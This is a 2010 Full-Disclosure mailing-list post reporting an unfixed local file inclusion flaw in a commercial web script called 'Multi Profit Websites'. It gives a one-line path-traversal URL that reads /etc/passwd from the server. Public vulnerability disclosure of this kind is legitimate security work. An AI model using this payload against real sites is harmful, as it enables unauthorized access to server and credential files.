
Date: Fri, 9 Apr 2010 19:51:26 +0530
From: rockey killer <skg102@...il.com>
To: h4ck3r_in@...glegroups.com, sec-adv@...unia.com, 
	full-disclosure@...ts.grok.org.uk
Subject: LFI In Multi Profit Websites

Local File Inclusion (LFI) in Multi Profit Websites


Multi Profit Websites is a commercial script that is running on multiple
domains and they claims that this script earns money for the owner.

Vulnerability

Local File Inclusion Via URL which can be reproduced by

domain/page.php?id=../../../../../../etc/passwd


Reported : 1st april 2009
Fixed : ----------------------

Credits,
H4CK3R Crew

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
